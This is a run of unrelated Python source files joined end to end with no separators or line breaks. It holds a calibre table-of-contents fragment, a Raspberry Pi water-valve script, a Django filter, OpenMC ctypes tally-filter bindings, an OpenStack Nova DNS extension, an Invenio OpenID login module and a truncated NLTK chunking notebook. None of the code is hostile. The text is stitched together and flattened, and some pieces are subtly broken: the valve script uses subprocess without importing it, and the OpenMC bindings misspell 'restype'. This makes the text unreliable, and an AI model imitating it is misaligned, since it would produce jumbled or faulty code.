'calibre_toc_%d'%counter) elem.set('id', id) href = '#'.join((item.href, id)) return text, href def add_leveled_toc_items(self): added = OrderedDict() added2 = OrderedDict() counter = 1 def find_matches(expr, doc): try: ans = XPath(expr)(doc) len(ans) return ans except: self.log.warn('Invalid ToC expression, ignoring: %s'%expr) return [] for document in self.oeb.spine: previous_level1 = list(added.itervalues())[-1] if added else None previous_level2 = list(added2.itervalues())[-1] if added2 else None level1_toc, level1_title = self.get_toc_parts_for_xpath(self.opts.level1_toc) for elem in find_matches(level1_toc, document.data): text, _href = self.elem_to_link(document, elem, level1_title, counter) counter += 1 if text: node = self.oeb.toc.add(text, _href, play_order=self.oeb.toc.next_play_order()) added[elem] = node # node.add(_('Top'), _href) if self.opts.level2_toc is not None and added: level2_toc, level2_title = self.get_toc_parts_for_xpath(self.opts.level2_toc) for elem in find_matches(level2_toc, document.data): level1 = None for item in document.data.iterdescendants(): if item in added: level1 = added[item] elif item == elem: if level1 is None: if previous_level1 is None: break level1 = previous_level1 text, _href = self.elem_to_link(document, elem, level2_title, counter) counter += 1 if text: added2[elem] = level1.add(text, _href, play_order=self.oeb.toc.next_play_order()) break if self.opts.level3_toc is not None and added2: level3_toc, level3_title = self.get_toc_parts_for_xpath(self.opts.level3_toc) for elem in find_matches(level3_toc, document.data): level2 = None for item in document.data.iterdescendants(): if item in added2: level2 = added2[item] elif item == elem: if level2 is None: if previous_level2 is None: break level2 = previous_level2 text, _href = \ self.elem_to_link(document, elem, level3_title, counter) counter += 1 if text: level2.add(text, _href, play_order=self.oeb.toc.next_play_order()) break
#!/usr/bin/python import sys, signal, logging, time, RPi.GPIO as GPIO FLOATSW_HIGH_WL = 26 # high water level float switch WATER_VALVE = 10 # GPIO port for the Water Electo valve, High by default after boot VALVE_CHGSTATE_TIMER = 25 # Electro valve needs roughly 20 seconds to switch from open to close and vice versa logger = None def Setup(): global logger logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) handler = logging.FileHandler('/var/log/rodi.log') handler.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s - %(message)s',"%Y-%m-%d %H:%M:%S") handler.setFormatter(formatter) logger.addHandler(handler) GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) GPIO.setup(WATER_VALVE, GPIO.OUT) GPIO.setup(FLOATSW_HIGH_WL, GPIO.IN, pull_up_down=GPIO.PUD_UP) #, initial = GPIO.HIGH) if not sys.stdout.isatty(): sys.stderr = open('/var/log/rodi_stderr.log', 'a') sys.stdout = open('/var/log/rodi_stdout.log', 'a') def Alert(message): global logger logger.info(message) # log the event print(message) logger.handlers[0].flush() def Close_valve(): GPIO.output(WATER_VALVE, False) Alert("Closing the RO/DI valve") def Open_valve(): if GPIO.input(WATER_VALVE) == True: Alert("RO/DI Valve already opened") sys.exit(5) else: Alert("Opening the RO/DI valve") GPIO.output(WATER_VALVE, True) time.sleep(VALVE_CHGSTATE_TIMER) def Refilling(): if GPIO.input(WATER_VALVE) == True: return True else: return False class GracefulKiller: kill_now = False def __init__(self): signal.signal(signal.SIGINT, self.exit_gracefully) signal.signal(signal.SIGTERM, self.exit_gracefully) def exit_gracefully(self,signum, frame): self.kill_now = True if not len(sys.argv) > 1: print("You must provide one numerical argument to this function (duration in seconds). Exiting.") sys.exit(1) if sys.argv[1] != "close" and sys.argv[1] != "stop" and not sys.argv[1].isdigit(): print("Value is neither 'close', 'stop' or a refill duration expressed in seconds") sys.exit(1) i = 0 killer = GracefulKiller() Setup() if sys.argv[1] == "close" or sys.argv[1] == "stop": Close_valve() if str.count(subprocess.check_output(["ps", "aux"]), "rodi") > 1: Alert("Warning, we were called while another instance of rodi.py was already in Memory") sys.exit(1) if GPIO.input(FLOATSW_HIGH_WL) == 0: Alert("Water level in sump already high, refilling would be dangerous, exiting") if GPIO.input(WATER_VALVE) == True: Alert("RO/DI Valve already opened while high water in the sump, closing.") Close_valve() sys.exit(3) if sys.argv[1].isdigit(): Alert("Not already refilling, sump water level normal, proceeding.") Alert("Refilling for " + sys.argv[1] + " seconds") try: Open_valve() while i<VALVE_CHGSTATE_TIMER+int(sys.argv[1]): time.sleep(1) i=i+1 if GPIO.input(FLOATSW_HIGH_WL) == 0: Alert("Water level in sump is now high, stopping the refill") Close_valve() sys.exit(3) break if killer.kill_now: Alert("Caught a Sigterm, Sigkill or CTRL+C, exiting.") Close_valve() sys.exit(2) break Alert("Refill done, exiting.") Close_valve() sys.exit(0) except (RuntimeError, IOError): Alert("Caught an exception, exiting.") Close_valve() sys.exit(4) # Exit code : # 5 : already refilling or cannot create lock file # 4 : Caught an exception # 3 : water is high either at start or during the refill # 2 : a sigkill, sigterm or keyboard CTRL+C signal was received # 1 : incorrect parameter received # 0 : all went fine
from django import template register = template.Library() @register.filter def package_usage(user): return user.package_set.all()
from collections.abc import Mapping from ctypes import c_int, c_int32, c_double, c_char_p, POINTER, \ create_string_buffer, c_size_t from weakref import WeakValueDictionary import numpy as np from numpy.ctypeslib import as_array from openmc.exceptions import AllocationError, InvalidIDError from . import _dll from .core import _FortranObjectWithID from .error import _error_handler from .material import Material from .mesh import RegularMesh __all__ = [ 'Filter', 'AzimuthalFilter', 'CellFilter', 'CellbornFilter', 'CellfromFilter', 'CellInstanceFilter', 'DistribcellFilter', 'DelayedGroupFilter', 'EnergyFilter', 'EnergyoutFilter', 'EnergyFunctionFilter', 'LegendreFilter', 'MaterialFilter', 'MeshFilter', 'MeshSurfaceFilter', 'MuFilter', 'ParticleFilter', 'PolarFilter', 'SphericalHarmonicsFilter', 'SpatialLegendreFilter', 'SurfaceFilter', 'UniverseFilter', 'ZernikeFilter', 'ZernikeRadialFilter', 'filters' ] # Tally functions _dll.openmc_cell_filter_get_bins.argtypes = [ c_int32, POINTER(POINTER(c_int32)), POINTER(c_int32)] _dll.openmc_cell_filter_get_bins.restype = c_int _dll.openmc_cell_filter_get_bins.errcheck = _error_handler _dll.openmc_energy_filter_get_bins.argtypes = [ c_int32, POINTER(POINTER(c_double)), POINTER(c_size_t)] _dll.openmc_energy_filter_get_bins.restype = c_int _dll.openmc_energy_filter_get_bins.errcheck = _error_handler _dll.openmc_energy_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_double)] _dll.openmc_energy_filter_set_bins.restype = c_int _dll.openmc_energy_filter_set_bins.errcheck = _error_handler _dll.openmc_energyfunc_filter_set_data.restype = c_int _dll.openmc_energyfunc_filter_set_data.errcheck = _error_handler _dll.openmc_energyfunc_filter_set_data.argtypes = [ c_int32, c_size_t, POINTER(c_double), POINTER(c_double)] _dll.openmc_energyfunc_filter_get_energy.resttpe = c_int _dll.openmc_energyfunc_filter_get_energy.errcheck = _error_handler _dll.openmc_energyfunc_filter_get_energy.argtypes = [ c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))] _dll.openmc_energyfunc_filter_get_y.resttpe = c_int _dll.openmc_energyfunc_filter_get_y.errcheck = _error_handler _dll.openmc_energyfunc_filter_get_y.argtypes = [ c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))] _dll.openmc_filter_get_id.argtypes = [c_int32, POINTER(c_int32)] _dll.openmc_filter_get_id.restype = c_int _dll.openmc_filter_get_id.errcheck = _error_handler _dll.openmc_filter_get_type.argtypes = [c_int32, c_char_p] _dll.openmc_filter_get_type.restype = c_int _dll.openmc_filter_get_type.errcheck = _error_handler _dll.openmc_filter_set_id.argtypes = [c_int32, c_int32] _dll.openmc_filter_set_id.restype = c_int _dll.openmc_filter_set_id.errcheck = _error_handler _dll.openmc_get_filter_index.argtypes = [c_int32, POINTER(c_int32)] _dll.openmc_get_filter_index.restype = c_int _dll.openmc_get_filter_index.errcheck = _error_handler _dll.openmc_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)] _dll.openmc_legendre_filter_get_order.restype = c_int _dll.openmc_legendre_filter_get_order.errcheck = _error_handler _dll.openmc_legendre_filter_set_order.argtypes = [c_int32, c_int] _dll.openmc_legendre_filter_set_order.restype = c_int _dll.openmc_legendre_filter_set_order.errcheck = _error_handler _dll.openmc_material_filter_get_bins.argtypes = [ c_int32, POINTER(POINTER(c_int32)), POINTER(c_size_t)] _dll.openmc_material_filter_get_bins.restype = c_int _dll.openmc_material_filter_get_bins.errcheck = _error_handler _dll.openmc_material_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_int32)] _dll.openmc_material_filter_set_bins.restype = c_int _dll.openmc_material_filter_set_bins.errcheck = _error_handler _dll.openmc_mesh_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)] _dll.openmc_mesh_filter_get_mesh.restype = c_int _dll.openmc_mesh_filter_get_mesh.errcheck = _error_handler _dll.openmc_mesh_filter_set_mesh.argtypes = [c_int32, c_int32] _dll.openmc_mesh_filter_set_mesh.restype = c_int _dll.openmc_mesh_filter_set_mesh.errcheck = _error_handler _dll.openmc_meshsurface_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)] _dll.openmc_meshsurface_filter_get_mesh.restype = c_int _dll.openmc_meshsurface_filter_get_mesh.errcheck = _error_handler _dll.openmc_meshsurface_filter_set_mesh.argtypes = [c_int32, c_int32] _dll.openmc_meshsurface_filter_set_mesh.restype = c_int _dll.openmc_meshsurface_filter_set_mesh.errcheck = _error_handler _dll.openmc_new_filter.argtypes = [c_char_p, POINTER(c_int32)] _dll.openmc_new_filter.restype = c_int _dll.openmc_new_filter.errcheck = _error_handler _dll.openmc_spatial_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)] _dll.openmc_spatial_legendre_filter_get_order.restype = c_int _dll.openmc_spatial_legendre_filter_get_order.errcheck = _error_handler _dll.openmc_spatial_legendre_filter_set_order.argtypes = [c_int32, c_int] _dll.openmc_spatial_legendre_filter_set_order.restype = c_int _dll.openmc_spatial_legendre_filter_set_order.errcheck = _error_handler _dll.openmc_sphharm_filter_get_order.argtypes = [c_int32, POINTER(c_int)] _dll.openmc_sphharm_filter_get_order.restype = c_int _dll.openmc_sphharm_filter_get_order.errcheck = _error_handler _dll.openmc_sphharm_filter_set_order.argtypes = [c_int32, c_int] _dll.openmc_sphharm_filter_set_order.restype = c_int _dll.openmc_sphharm_filter_set_order.errcheck = _error_handler _dll.openmc_zernike_filter_get_order.argtypes = [c_int32, POINTER(c_int)] _dll.openmc_zernike_filter_get_order.restype = c_int _dll.openmc_zernike_filter_get_order.errcheck = _error_handler _dll.openmc_zernike_filter_set_order.argtypes = [c_int32, c_int] _dll.openmc_zernike_filter_set_order.restype = c_int _dll.openmc_zernike_filter_set_order.errcheck = _error_handler _dll.tally_filters_size.restype = c_size_t class Filter(_FortranObjectWithID): __instances = WeakValueDictionary() def __new__(cls, obj=None, uid=None, new=True, index=None): mapping = filters if index is None: if new: # Determine ID to assign if uid is None: uid = max(mapping, default=0) + 1 else: if uid in mapping: raise AllocationError('A filter with ID={} has already ' 'been allocated.'.format(uid)) # Set the filter type -- note that the filter_type attribute # only exists on subclasses! index = c_int32() _dll.openmc_new_filter(cls.filter_type.encode(), index) index = index.value else: index = mapping[uid]._index if index not in cls.__instances: instance = super().__new__(cls) instance._index = index if uid is not None: instance.id = uid cls.__instances[index] = instance return cls.__instances[index] @property def id(self): filter_id = c_int32() _dll.openmc_filter_get_id(self._index, filter_id) return filter_id.value @id.setter def id(self, filter_id): _dll.openmc_filter_set_id(self._index, filter_id) class EnergyFilter(Filter): filter_type = 'energy' def __init__(self, bins=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if bins is not None: self.bins = bins @property def bins(self): energies = POINTER(c_double)() n = c_size_t() _dll.openmc_energy_filter_get_bins(self._index, energies, n) return as_array(energies, (n.value,)) @bins.setter def bins(self, bins): # Get numpy array as a double* energies = np.asarray(bins) energies_p = energies.ctypes.data_as(POINTER(c_double)) _dll.openmc_energy_filter_set_bins( self._index, len(energies), energies_p) class EnergyoutFilter(EnergyFilter): filter_type = 'energyout' class AzimuthalFilter(Filter): filter_type = 'azimuthal' class CellFilter(Filter): filter_type = 'cell' @property def bins(self): cells = POINTER(c_int32)() n = c_int32() _dll.openmc_cell_filter_get_bins(self._index, cells, n) return as_array(cells, (n.value,)) class CellbornFilter(Filter): filter_type = 'cellborn' class CellfromFilter(Filter): filter_type = 'cellfrom' class CellInstanceFilter(Filter): filter_type = 'cellinstance' class DelayedGroupFilter(Filter): filter_type = 'delayedgroup' class DistribcellFilter(Filter): filter_type = 'distribcell' class EnergyFunctionFilter(Filter): filter_type = 'energyfunction' def __new__(cls, energy=None, y=None, uid=None, new=True, index=None): return super().__new__(cls, uid=uid, new=new, index=index) def __init__(self, energy=None, y=None, uid=None, new=True, index=None): if (energy is None) != (y is None): raise AttributeError("Need both energy and y or neither") super().__init__(uid, new, index) if energy is not None: self.set_data(energy, y) def set_data(self, energy, y): """Set the interpolation information for the filter Parameters ---------- energy : numpy.ndarray Independent variable for the interpolation y : numpy.ndarray Dependent variable for the interpolation """ energy_array = np.asarray(energy) y_array = np.asarray(y) energy_p = energy_array.ctypes.data_as(POINTER(c_double)) y_p = y_array.ctypes.data_as(POINTER(c_double)) _dll.openmc_energyfunc_filter_set_data( self._index, len(energy_array), energy_p, y_p) @property def energy(self): return self._get_attr(_dll.openmc_energyfunc_filter_get_energy) @property def y(self): return self._get_attr(_dll.openmc_energyfunc_filter_get_y) def _get_attr(self, cfunc): array_p = POINTER(c_double)() n = c_size_t() cfunc(self._index, n, array_p) return as_array(array_p, (n.value, )) class LegendreFilter(Filter): filter_type = 'legendre' def __init__(self, order=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if order is not None: self.order = order @property def order(self): temp_order = c_int() _dll.openmc_legendre_filter_get_order(self._index, temp_order) return temp_order.value @order.setter def order(self, order): _dll.openmc_legendre_filter_set_order(self._index, order) class MaterialFilter(Filter): filter_type = 'material' def __init__(self, bins=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if bins is not None: self.bins = bins @property def bins(self): materials = POINTER(c_int32)() n = c_size_t() _dll.openmc_material_filter_get_bins(self._index, materials, n) return [Material(index=materials[i]) for i in range(n.value)] @bins.setter def bins(self, materials): # Get material indices as int32_t[] n = len(materials) bins = (c_int32*n)(*(m._index for m in materials)) _dll.openmc_material_filter_set_bins(self._index, n, bins) class MeshFilter(Filter): filter_type = 'mesh' def __init__(self, mesh=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if mesh is not None: self.mesh = mesh @property def mesh(self): index_mesh = c_int32() _dll.openmc_mesh_filter_get_mesh(self._index, index_mesh) return RegularMesh(index=index_mesh.value) @mesh.setter def mesh(self, mesh): _dll.openmc_mesh_filter_set_mesh(self._index, mesh._index) class MeshSurfaceFilter(Filter): filter_type = 'meshsurface' def __init__(self, mesh=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if mesh is not None: self.mesh = mesh @property def mesh(self): index_mesh = c_int32() _dll.openmc_meshsurface_filter_get_mesh(self._index, index_mesh) return RegularMesh(index=index_mesh.value) @mesh.setter def mesh(self, mesh): _dll.openmc_meshsurface_filter_set_mesh(self._index, mesh._index) class MuFilter(Filter): filter_type = 'mu' class ParticleFilter(Filter): filter_type = 'particle' class PolarFilter(Filter): filter_type = 'polar' class SphericalHarmonicsFilter(Filter): filter_type = 'sphericalharmonics' def __init__(self, order=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if order is not None: self.order = order @property def order(self): temp_order = c_int() _dll.openmc_sphharm_filter_get_order(self._index, temp_order) return temp_order.value @order.setter def order(self, order): _dll.openmc_sphharm_filter_set_order(self._index, order) class SpatialLegendreFilter(Filter): filter_type = 'spatiallegendre' def __init__(self, order=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if order is not None: self.order = order @property def order(self): temp_order = c_int() _dll.openmc_spatial_legendre_filter_get_order(self._index, temp_order) return temp_order.value @order.setter def order(self, order): _dll.openmc_spatial_legendre_filter_set_order(self._index, order) class SurfaceFilter(Filter): filter_type = 'surface' class UniverseFilter(Filter): filter_type = 'universe' class ZernikeFilter(Filter): filter_type = 'zernike' def __init__(self, order=None, uid=None, new=True, index=None): super().__init__(uid, new, index) if order is not None: self.order = order @property def order(self): temp_order = c_int() _dll.openmc_zernike_filter_get_order(self._index, temp_order) return temp_order.value @order.setter def order(self, order): _dll.openmc_zernike_filter_set_order(self._index, order) class ZernikeRadialFilter(ZernikeFilter): filter_type = 'zernikeradial' _FILTER_TYPE_MAP = { 'azimuthal': AzimuthalFilter, 'cell': CellFilter, 'cellborn': CellbornFilter, 'cellfrom': CellfromFilter, 'cellinstance': CellInstanceFilter, 'delayedgroup': DelayedGroupFilter, 'distribcell': DistribcellFilter, 'energy': EnergyFilter, 'energyout': EnergyoutFilter, 'energyfunction': EnergyFunctionFilter, 'legendre': LegendreFilter, 'material': MaterialFilter, 'mesh': MeshFilter, 'meshsurface': MeshSurfaceFilter, 'mu': MuFilter, 'particle': ParticleFilter, 'polar': PolarFilter, 'sphericalharmonics': SphericalHarmonicsFilter, 'spatiallegendre': SpatialLegendreFilter, 'surface': SurfaceFilter, 'universe': UniverseFilter, 'zernike': ZernikeFilter, 'zernikeradial': ZernikeRadialFilter } def _get_filter(index): filter_type = create_string_buffer(20) _dll.openmc_filter_get_type(index, filter_type) filter_type = filter_type.value.decode() return _FILTER_TYPE_MAP[filter_type](index=index) class _FilterMapping(Mapping): def __getitem__(self, key): index = c_int32() try: _dll.openmc_get_filter_index(key, index) except (AllocationError, InvalidIDError) as e: # __contains__ expects a KeyError to work correctly raise KeyError(str(e)) return _get_filter(index.value) def __iter__(self): for i in range(len(self)): yield _get_filter(i).id def __len__(self): return _dll.tally_filters_size() def __repr__(self): return repr(dict(self)) filters = _FilterMapping()
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import urllib import webob from nova.api.openstack import extensions from nova.api.openstack import wsgi from nova import exception from nova.i18n import _ from nova import network from nova import utils ALIAS = "os-floating-ip-dns" authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS) def _translate_dns_entry_view(dns_entry): result = {} result['ip'] = dns_entry.get('ip') result['id'] = dns_entry.get('id') result['type'] = dns_entry.get('type') result['domain'] = dns_entry.get('domain') result['name'] = dns_entry.get('name') return {'dns_entry': result} def _translate_dns_entries_view(dns_entries): return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry'] for entry in dns_entries]} def _translate_domain_entry_view(domain_entry): result = {} result['domain'] = domain_entry.get('domain') result['scope'] = domain_entry.get('scope') result['project'] = domain_entry.get('project') result['availability_zone'] = domain_entry.get('availability_zone') return {'domain_entry': result} def _translate_domain_entries_view(domain_entries): return {'domain_entries': [_translate_domain_entry_view(entry)['domain_entry'] for entry in domain_entries]} def _unquote_domain(domain): """Unquoting function for receiving a domain name in a URL. Domain names tend to have .'s in them. Urllib doesn't quote dots, but Routes tends to choke on them, so we need an extra level of by-hand quoting here. """ return urllib.unquote(domain).replace('%2E', '.') def _create_dns_entry(ip, name, domain): return {'ip': ip, 'name': name, 'domain': domain} def _create_domain_entry(domain, scope=None, project=None, av_zone=None): return {'domain': domain, 'scope': scope, 'project': project, 'availability_zone': av_zone} class FloatingIPDNSDomainController(object): """DNS domain controller for OpenStack API.""" def __init__(self): super(FloatingIPDNSDomainController, self).__init__() self.network_api = network.API() @extensions.expected_errors(501) def index(self, req): """Return a list of available DNS domains.""" context = req.environ['nova.context'] authorize(context) try: domains = self.network_api.get_dns_domains(context) except NotImplementedError: msg = _("Unable to create dns domain") raise webob.exc.HTTPNotImplemented(explanation=msg) domainlist = [_create_domain_entry(domain['domain'], domain.get('scope'), domain.get('project'), domain.get('availability_zone')) for domain in domains] return _translate_domain_entries_view(domainlist) @extensions.expected_errors((422, 501)) def update(self, req, id, body): """Add or modify domain entry.""" context = req.environ['nova.context'] authorize(context) fqdomain = _unquote_domain(id) try: entry = body['domain_entry'] scope = entry['scope'] except (TypeError, KeyError): raise webob.exc.HTTPUnprocessableEntity() project = entry.get('project', None) av_zone = entry.get('availability_zone', None) if (scope not in ('private', 'public') or project and av_zone or scope == 'private' and project or scope == 'public' and av_zone): raise webob.exc.HTTPUnprocessableEntity() try: if scope == 'private': create_dns_domain = self.network_api.create_private_dns_domain area_name, area = 'availability_zone', av_zone else: create_dns_domain = self.network_api.create_public_dns_domain area_name, area = 'project', project except NotImplementedError: msg = _("Unable to create dns domain") raise webob.exc.HTTPNotImplemented(explanation=msg) create_dns_domain(context, fqdomain, area) return _translate_domain_entry_view({'domain': fqdomain, 'scope': scope, area_name: area}) @extensions.expected_errors((404, 501)) @wsgi.response(202) def delete(self, req, id): """Delete the domain identified by id.""" context = req.environ['nova.context'] authorize(context) domain = _unquote_domain(id) # Delete the whole domain try: self.network_api.delete_dns_domain(context, domain) except NotImplementedError: msg = _("Unable to delete dns domain") raise webob.exc.HTTPNotImplemented(explanation=msg) except exception.NotFound as e: raise webob.exc.HTTPNotFound(explanation=e.format_message()) class FloatingIPDNSEntryController(object): """DNS Entry controller for OpenStack API.""" def __init__(self): super(FloatingIPDNSEntryController, self).__init__() self.network_api = network.API() @extensions.expected_errors((422, 404, 501)) def show(self, req, domain_id, id): """Return the DNS entry that corresponds to domain_id and id.""" context = req.environ['nova.context'] authorize(context) domain = _unquote_domain(domain_id) floating_ip = None # Check whether id is a valid ipv4/ipv6 address. if utils.is_valid_ipv4(id) or utils.is_valid_ipv6(id): floating_ip = id try: if floating_ip: entries = self.network_api.get_dns_entries_by_address(context, floating_ip, domain) else: entries = self.network_api.get_dns_entries_by_name(context, id, domain) except NotImplementedError: msg = _("Unable to get dns domain") raise webob.exc.HTTPNotImplemented(explanation=msg) if not entries: explanation = _("DNS entries not found.") raise webob.exc.HTTPNotFound(explanation=explanation) if floating_ip: entrylist = [_create_dns_entry(floating_ip, entry, domain) for entry in entries] dns_entries = _translate_dns_entries_view(entrylist) return wsgi.ResponseObject(dns_entries) entry = _create_dns_entry(entries[0], id, domain) return _translate_dns_entry_view(entry) @extensions.expected_errors((422, 501)) def update(self, req, domain_id, id, body): """Add or modify dns entry.""" context = req.environ['nova.context'] authorize(context) domain = _unquote_domain(domain_id) name = id try: entry = body['dns_entry'] address = entry['ip'] dns_type = entry['dns_type'] except (TypeError, KeyError): raise webob.exc.HTTPUnprocessableEntity() try: entries = self.network_api.get_dns_entries_by_name(context, name, domain) if not entries: # create! self.network_api.add_dns_entry(context, address, name, dns_type, domain) else: # modify! self.network_api.modify_dns_entry(context, name, address, domain) except NotImplementedError: msg = _("Unable to update dns domain") raise webob.exc.HTTPNotImplemented(explanation=msg) return _translate_dns_entry_view({'ip': address, 'name': name, 'type': dns_type, 'domain': domain}) @extensions.expected_errors((404, 501)) @wsgi.response(202) def delete(self, req, domain_id, id): """Delete the entry identified by req and id.""" context = req.environ['nova.context'] authorize(context) domain = _unquote_domain(domain_id) name = id try: self.network_api.delete_dns_entry(context, name, domain) except NotImplementedError: msg = _("Unable to delete dns domain") raise webob.exc.HTTPNotImplemented(explanation=msg) except exception.NotFound as e: raise webob.exc.HTTPNotFound(explanation=e.format_message()) class FloatingIpDns(extensions.V3APIExtensionBase): """Floating IP DNS support.""" name = "FloatingIpDns" alias = ALIAS version = 1 def get_resources(self): resources = [] res = extensions.ResourceExtension(ALIAS, controller=FloatingIPDNSDomainController()) resources.append(res) res = extensions.ResourceExtension('entries', controller=FloatingIPDNSEntryController(), parent={'member_name': 'domain', 'collection_name': 'os-floating-ip-dns'}) resources.append(res) return resources def get_controller_extensions(self): """It's an abstract function V3APIExtensionBase and the extension will not be loaded without it. """ return []
# -*- coding: utf-8 -*- ## ## This file is part of Invenio. ## Copyright (C) 2012 CERN. ## ## Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """ This module contains functions and methods to authenticate with OpenID providers. """ __revision__ = \ "$Id$" from invenio.config import CFG_SITE_SECURE_URL from invenio.external_authentication import ExternalAuth from invenio.session import get_session class ExternalOpenID(ExternalAuth): """ Contains methods for authenticate with an OpenID provider. """ @staticmethod def __init_req(req): req.g['openid_provider_name'] = '' req.g['openid_debug'] = 0 req.g['openid_msg'] = '' req.g['openid_debug_msg'] = '' req.g['openid_response'] = None def auth_user(self, username, password, req=None): """ Tries to find email and OpenID identity of the user. If it doesn't find any of them, returns (None, None) @param username: Isn't used in this function @type username: str @param password: Isn't used in this function @type password: str @param req: request @type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest @rtype: str|NoneType, str|NoneType """ from openid.consumer import consumer self._get_response(req) response = req.g['openid_response'] identity = None email = None if response.status == consumer.SUCCESS: # In the first login of the user, fetches his/her email # from OpenID provider. email = self._get_email_from_success_response(req) identity = response.getDisplayIdentifier() elif response.status == consumer.CANCEL: # If user cancels the verification, set corresponding message. req.openid_msg = 21 elif response.status == consumer.FAILURE: # If verification fails, set corresponding message. req.openid_msg.msg = 22 return email, identity @staticmethod def get_msg(req): return req.g['openid_msg'] def fetch_user_nickname(self, username, password=None, req=None): """ Fetches the OpenID provider for nickname of the user. If it doesn't find any, returns None. This function doesn't need username, password or req. They are exist just because this class is derived from ExternalAuth @param username: Isn't used in this function @type username: str @param password: Isn't used in this function @type password: str @param req: request @type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest @rtype: str|NoneType """ from openid.extensions import ax from openid.extensions import sreg nickname = None # May be either Simple Registration (sreg) response or # Attribute Exchange (ax) response. sreg_resp = None ax_resp = None response = req.g['openid_response'] sreg_resp = sreg.SRegResponse.fromSuccessResponse(response) if sreg_resp: if sreg_resp.getExtensionArgs().has_key('nickname'): nickname = sreg_resp.getExtensionArgs()['nickname'] ax_resp = ax.FetchResponse.fromSuccessResponse(response) if ax_resp and not nickname: extensions = ax_resp.getExtensionArgs() if extensions.has_key('type.ext0') and \ extensions.has_key('value.ext0.1'): if extensions['type.ext0'] == \ 'http://axschema.org/namePerson/friendly': nickname = extensions['value.ext0.1'] if extensions.has_key('type.ext1') and \ extensions.has_key('value.ext1.1') and not nickname: if extensions['type.ext1'] == \ 'http://axschema.org/namePerson/friendly': nickname = extensions['value.ext1.1'] return nickname @staticmethod def _get_email_from_success_response(req): """ Fetches the email from consumer.SuccessResponse. If it doesn't find any returns None. @rtype: str|NoneType """ from openid.extensions import ax email = None response = req.g['openid_response'] ax_resp = ax.FetchResponse.fromSuccessResponse(response) if ax_resp: extensions = ax_resp.getExtensionArgs() if extensions.has_key('type.ext0') and \ extensions.has_key('value.ext0.1'): if extensions['type.ext0'] == \ 'http://axschema.org/contact/email': email = extensions['value.ext0.1'] if extensions.has_key('type.ext1') and \ extensions.has_key('value.ext1.1') and not email: if extensions['type.ext1'] == \ 'http://axschema.org/contact/email': email = extensions['value.ext1.1'] return email @staticmethod def _get_response(req): """ Constructs the response returned from the OpenID provider @param req: request @type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest """ from invenio.webinterface_handler import wash_urlargd from openid.consumer import consumer content = {} for key in req.form.keys(): content[key] = (str, '') args = wash_urlargd(req.form, content) if args.has_key('ln'): del args['ln'] if args.has_key('referer'): if not args['referer']: del args['referer'] oidconsumer = consumer.Consumer({"id": get_session(req)}, None) url = CFG_SITE_SECURE_URL + "/youraccount/login" req.g['openid_provider_name'] = args['provider'] req.g['openid_response'] = oidconsumer.complete(args, url)
#%% # information extraction: getting meaning from text import nltk, re, pprint def preprocess(document): sents = nltk.sent_tokenize(document) sents = [nltk.word_tokenize(sent) for sent in sents] sents = [nltk.pos_tag(sent) for sent in sents] return sents #%% chunking # NP-chunking # one of most useful sources of information for NP-chunking is POS tags sentence = [("the", "DT"), ("little", "JJ"), ("yellow", "JJ"), ("dog", "NN"), ("barked", "VBD"), ("at", "IN"), ("the", "DT"), ("cat", "NN")] grammar = "NP: {<DT>?<JJ>*<NN>}" cp = nltk.RegexpParser(grammar) result = cp.parse(sentence) print(result) result.draw() #%% from nltk.corpus import conll2000 print(conll2000.chunked_sents('train.txt')[99]) print(conll2000.chunked_sents('train.txt',chunk_types=['NP'])[99]) #%% cp = nltk.RegexpParser("") test_sents = conll2000.chunked_sents('test.txt',chunk_types=['NP']) print(cp.evaluate(test_sents)) #%% grammar = r"NP: {<[CDJNP].*>+}" cp = nltk.RegexpParser(grammar) print(cp.evaluate(test_sents)) #%% class UnigramChunker(nltk.ChunkParserI): def __init__(self,train_sents): train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)] for sent in train_sents] self.tagger = nltk.UnigramTagger(train_data) def parse(self,sentence): pos_tags = [pos for (word,pos) in sentence] tagged_pos_tags = self.tagger.tag(pos_tags) chunktags = [chunktag for (pos,chunktag) in tagged_pos_tags] conlltags = [(word,pos,chunktag) for ((word,pos),chunktag) in zip(sentence,chunktags)] return nltk.chunk.conlltags2tree(conlltags) test_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP']) train_sents = conll2000.chunked_sents('train.txt',chunk_types=['NP']) unigram_chunker = UnigramChunker(train_sents) print(unigram_chunker.evaluate(test_sents)) #%% what learned postags = sorted(set(pos for sent in train_sents for (word,pos) in 